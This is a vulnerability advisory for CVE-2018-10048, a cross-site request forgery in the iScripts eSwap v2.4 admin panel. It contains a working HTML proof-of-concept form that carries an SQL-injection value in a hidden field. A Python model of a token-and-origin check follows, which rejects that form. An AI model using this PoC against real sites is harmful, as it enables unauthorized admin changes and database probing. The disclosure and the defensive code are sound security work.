CVE-2018-10048

ManhNho Apr 11th, 2018 (edited)
# Exploit title: iScripts eSwap v2.4 - CSRF via the registration_settings.php Admin Panel
# Date: 11/04/2018
# Exploit Author: ManhNho
# Vendor Homepage: https://www.iscripts.com
# Software Link: https://www.iscripts.com/eswap
# Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
# Version: 2.4
# CVE: CVE-2018-10048
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
iScripts eSwap v2.4 has CSRF via the "registration_settings.php" function parameter in the Admin Panel.

#2. PoC
-----------------------------------------------------
a) Send the crafted page below to a logged-in user who has Root Administrator level access.

<html>
  <!-- CSRF PoC - ManhNho -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php?act=post" method="POST">
      <input type="hidden" name="ddlFree" value="&#45;1&apos;&#32;order&#32;by&#32;0&#32;&#35;" />
      <input type="hidden" name="txtDate" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

b) Once the logged-in user opens the URL, the form is submitted with the root administrator's active session and the action is performed successfully.
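The server-side check that would stop this PoC, added here as a Python model of the handler rather than eSwap's own PHP code: the csrf_token field name, the APP_ORIGIN value (taken from the demo URL above) and the sample form dictionary are assumptions; the check itself is the standard synchronizer token combined with an Origin/Referer comparison, both of which the PoC form fails.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed values (not from eSwap): the app origin is taken from the advisory's
# demo URL; the token field name is one eSwap 2.4 does not have.
APP_ORIGIN = "https://www.demo.iscripts.com"
TOKEN_FIELD = "csrf_token"


def issue_token(session: dict) -> str:
    """Create the per-session synchronizer token once; the settings form must echo it."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def is_trusted_request(session: dict, form: dict, headers: dict) -> bool:
    """Accept the POST only if it echoes the session token AND comes from our origin.

    The PoC form fails both checks: it knows only ddlFree and txtDate, and the
    browser sends the attacker page's Origin/Referer, not the application's.
    """
    expected = session.get(TOKEN_FIELD, "")
    submitted = form.get(TOKEN_FIELD, "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    source = headers.get("Origin") or headers.get("Referer")
    if not source:  # no provenance at all: treat as cross-site
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == APP_ORIGIN


def handle_registration_settings(session: dict, form: dict, headers: dict) -> tuple:
    """Model of registration_settings.php?act=post with the check ahead of the update."""
    if not is_trusted_request(session, form, headers):
        return 403, "rejected: missing token or cross-site request, settings unchanged"
    # A real handler would validate ddlFree/txtDate here before touching the database.
    return 200, f"updated: ddlFree={form['ddlFree']!r} txtDate={form['txtDate']!r}"

# Constructed sample: exactly the fields the PoC form posts, with no token.
POC_FORM = {"ddlFree": "-1' order by 0 #", "txtDate": "1"}

if __name__ == "__main__":
    admin = {}
    token = issue_token(admin)
    print(handle_registration_settings(admin, POC_FORM, {"Origin": "https://attacker.example"}))
    print(handle_registration_settings(admin, {**POC_FORM, TOKEN_FIELD: token}, {"Origin": APP_ORIGIN}))
```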